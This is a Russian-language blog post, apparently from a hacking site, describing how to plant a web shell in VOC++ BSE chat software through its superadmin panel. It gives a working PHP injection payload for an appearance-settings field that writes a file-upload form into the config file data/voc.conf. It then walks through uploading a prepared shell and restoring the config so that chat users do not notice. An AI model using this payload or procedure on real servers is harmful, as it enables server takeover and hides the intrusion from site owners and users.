Заливка шелла в VOC++ BSE через админку чата

Столько разговоров о безопасности и непробиваемости VOC++ BSE, аудиторские проверки античата, а админку прикрыть никто не удосужился. При наличии админских прав, т.е. доступа в Панель суперадминистратора - chat.ru/admin/, залить шелл проще простого. Причина как всегда недостаточная фильтрация входящих данных, что позволяет атакующему, вносить произвольные данные, в файл data/voc.conf. Многие скажут, что при правильной настройке чата, папка data и соответственно файл voc.conf, лежат за пределами веб-директории, оно конечно так, но это основной конфигурационный файл чата, а стало быть используется во многих файлах доступных извне.
Пример (скриншоты взяты с чата поднятого на локалке, в процессе опытов ни 1 чат не пострадал)
Зайдем в суперадминку чата -> Внешний вид
В поле Подсветка сообщения, если ник находится в его теле: Закрывающий тег внесем что-то типа простейшего загрузчика файлов, для удобства с уже готовой формой загрузки -

\"; echo   '<form action=admin_conf.php?step=2 method=post enctype=multipart/form-data><input type=file name=filename><br><input type=submit value=Загрузить><br></form>'; move_uploaded_file($_FILES['filename']['tmp_name'], $_FILES['filename']['name']);  ?> 
Заливка шелла в VOC++ BSE через админку чата
После того как мы нажмем сохранить, мы увидим, следующее -
Заливка шелла в VOC++ BSE через админку чата
Вот здесь надо поторопиться, так как другие пользователи находящиеся в чате будут видеть подобную картинку.
Жмем Обзор, выбираем у себя на компьютере заранее заготовленный шелл, и заливаем в чат.
Заходим через шелл идем в папку DATA и приводим файл voc.conf к первоначальному виду, т.е. переменная $str_w_n_after должна иметь вид -
$str_w_n_after = "</span>";
Далее пользуемся залитым шеллом.

Оставить комментарий

  • Смайлы и люди
    Животные и природа
    Еда и напитки
    Активность
    Путешествия и места
    Предметы
    Символы
    Флаги